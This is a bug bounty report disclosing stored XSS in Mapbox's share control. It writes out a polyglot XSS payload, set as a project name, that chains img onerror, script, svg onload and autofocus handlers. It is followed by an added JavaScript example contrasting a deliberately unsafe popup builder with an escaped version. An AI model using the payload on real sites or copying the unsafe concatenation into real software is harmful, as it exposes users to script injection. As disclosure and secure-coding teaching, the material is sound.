Mapbox: XSS in L.mapbox.shareControl in mapbox.js

ID H1:99245
Type hackerone
Reporter enderun07
Modified 2016-05-03T22:37:49


Hi Mapbox

I've found an XSS vulnerability in the Mapbox sharing system.

I have a project named "'><img src=a onerror=confirm(2)>"><script>alert(1);</script><iframe onload=alert(97)>"><svg onload=alert(2);>"onmouseover="confirm(2);<input onfocus=prompt(1) autofocus>"--> </script><svg/onload=';alert(/XSSPOSED/);'>"

Then click it, copy the share URL, and go to the URL.

Then click the marked area, and you will see the vulnerability.
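
The report does not show the code behind the share control, so the following is an added example, not mapbox.js source and not part of the report: a share popup builder that concatenates the project name into markup, next to a version that encodes it for each context it lands in. The function names, popup markup and the example.com URL are assumptions; the sample name is the first fragment of the project name quoted above.

```javascript
// Added example. Hypothetical helpers, not the mapbox.js implementation.

// Escape the characters that let text break out of an HTML element
// or out of a single- or double-quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Before: the user-controlled name is concatenated straight into markup,
// once as element content and once inside a quoted attribute.
function buildSharePopupUnsafe(name, url) {
  return '<h3>' + name + '</h3>' +
    "<input type='text' value='" + url + '?title=' + name + "'>";
}

// After: URL-encode the name where it becomes part of a URL, then
// HTML-escape every value at the point it is written into markup.
// encodeURIComponent leaves ' untouched, so the HTML escape is still needed.
function buildSharePopupSafe(name, url) {
  const shareUrl = url + '?title=' + encodeURIComponent(name);
  return '<h3>' + escapeHtml(name) + '</h3>' +
    "<input type='text' value='" + escapeHtml(shareUrl) + "'>";
}

// Count occurrences of one character; used to confirm the output holds
// only the template's own tag openers and attribute quotes.
function countChar(text, ch) {
  return text.split(ch).length - 1;
}

// First fragment of the project name from the report.
const SAMPLE_NAME = "'><img src=a onerror=confirm(2)>";
const SAMPLE_URL = 'https://example.com/map'; // constructed placeholder

const unsafeHtml = buildSharePopupUnsafe(SAMPLE_NAME, SAMPLE_URL);
const safeHtml = buildSharePopupSafe(SAMPLE_NAME, SAMPLE_URL);

console.log('unsafe:', unsafeHtml);
console.log('safe:  ', safeHtml);
```

Where the popup is built in the browser, setting `textContent` and the input's `value` property instead of assembling an HTML string avoids the escaping step altogether.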